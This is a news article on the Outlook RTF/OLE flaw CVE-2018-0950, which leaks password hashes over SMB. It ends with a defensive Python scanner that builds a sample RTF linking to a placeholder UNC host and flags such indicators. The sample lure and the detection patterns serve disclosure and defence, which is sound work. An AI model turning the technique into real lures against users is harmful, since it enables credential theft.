April 14, 2018
Microsoft released a patch for Outlook on Tuesday that reportedly fixes over 60 exploitable points and critical flaws in the program. However, one weakness remains very much open to hackers, who can easily acquire credentials through it.
The exploitable point was identified over a year ago: password hashes could be leaked when a user merely previewed an email carrying a Rich Text Format (RTF) file. Opening the file was not necessary, because Outlook renders a preview of it. If the RTF document contains OLE (object linking and embedding) content, the preview embeds and renders the object, which is handled by another program.
By contrast, Outlook does restrict the loading of other remote content, such as web images, which prevents the leakage of IP addresses and identifying metadata.
Threat researcher Will Dormann of the CERT Coordination Center first discovered the flaw in November 2016; it was later assigned the identifier CVE-2018-0950. Dormann states that the patch does not fully cover the exploit.
Analysis of the attack
The only user interaction necessary for the attack to take place is for the victim to open an email with an RTF file attachment. The file then initiates a Server Message Block (SMB) connection to a malicious server and immediately leaks sensitive data, such as the IP address, domain name, username, hostname, and session key.
In his proof-of-concept experiment, Dormann simulated an attack that collected password hashes, using the GitHub-hosted Responder and John the Ripper tools. He was able to recover simple passwords in a matter of minutes on a single computer.
A 4-letter, lowercase password took only 1 second to crack, while an 8-character lowercase password took 16 minutes. Mixed-case letter passwords took 3 days, and mixed-case passwords that also contained numbers took 12 days.
Dormann states that the best case tested, 8-character passwords made up of mixed-case letters, numbers, and symbols, would have taken approximately 1 year to crack.
Following Microsoft's latest patch, Outlook emails containing remotely hosted OLE content will no longer initiate an SMB session with a remote server. However, Dormann states that this does not completely immunize the user against attacks.
If the email contains a Universal Naming Convention (UNC) link, clicking it still launches an SMB connection. These links always start with ‘\\’, and a single click on the link is the only user action required for the attack to start.
Finally, Dormann recommends a number of precautionary steps against such attacks: install the latest MS Outlook patch, use more complex passwords, or rather passphrases, and use a password manager to generate them. He also recommends that system administrators block SMB connections, which can be done by closing a number of ports, and restrict single sign-on (SSO) logins.
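As an added detection example (not code from the article or from Dormann's report), the following Python script checks an RTF body for the two ingredients described above: an OLE object marked to update automatically, and a UNC path, whether hidden in the object's hex data or written as an escaped link in the text. The sample RTF and the host name files.example.invalid are constructed for illustration; a mail gateway could apply the same check to incoming attachments.

```python
import re
# \object marks an embedded OLE object; \objautlink / \objupdate mark a linked
# object that the preview pane resolves without any click.
OBJECT_RE = re.compile(r'\\object\b')
AUTOLINK_RE = re.compile(r'\\objautlink\b|\\objupdate\b')
OBJDATA_RE = re.compile(r'\\objdata\s*([0-9A-Fa-f\s]+)')  # hex OLE payload
RAW_UNC_RE = re.compile(rb'\\\\([A-Za-z0-9._-]+)\\')  # \\host\... in bytes
# RTF escapes each backslash, so a UNC link in text reads \\\\host\\share.
ESCAPED_UNC_RE = re.compile(r'\\\\\\\\([A-Za-z0-9._-]+)\\\\')

# Constructed sample: a linked OLE object plus a HYPERLINK field, both
# pointing at the placeholder host files.example.invalid.
UNC_TARGET = "\\\\files.example.invalid\\share\\doc.rtf"
SAMPLE_RTF = (
    "{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata 01050000"
    + UNC_TARGET.encode("ascii").hex() + "}}"
    "\\par {\\field{\\*\\fldinst HYPERLINK \""
    + UNC_TARGET.replace("\\", "\\\\") + "\"}}}"
)

def scan_rtf(rtf: str) -> dict:
    """Return the OLE and UNC indicators found in one RTF body."""
    hosts = []
    def add(host):
        if host not in hosts:
            hosts.append(host)
    for m in OBJDATA_RE.finditer(rtf):
        try:
            blob = bytes.fromhex(re.sub(r"\s+", "", m.group(1)))
        except ValueError:
            continue  # undecodable hex: skip this object
        # The path may be ANSI or UTF-16LE; dropping NUL bytes folds the
        # UTF-16LE case into the same ASCII search.
        for data in (blob, blob.replace(b"\x00", b"")):
            for h in RAW_UNC_RE.findall(data):
                add(h.decode("ascii", "replace"))
    for host in ESCAPED_UNC_RE.findall(rtf):
        add(host)
    return {
        "has_ole_object": bool(OBJECT_RE.search(rtf)),
        "auto_updating_link": bool(AUTOLINK_RE.search(rtf)),
        "unc_hosts": hosts,
    }

def verdict(report: dict) -> str:
    """Gateway decision: block auto-resolving UNC links, queue the rest for review."""
    if report["unc_hosts"] and report["auto_updating_link"]:
        return "block"
    if report["unc_hosts"] or report["has_ole_object"]:
        return "review"
    return "allow"
```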
Read Will Dormann’s report here.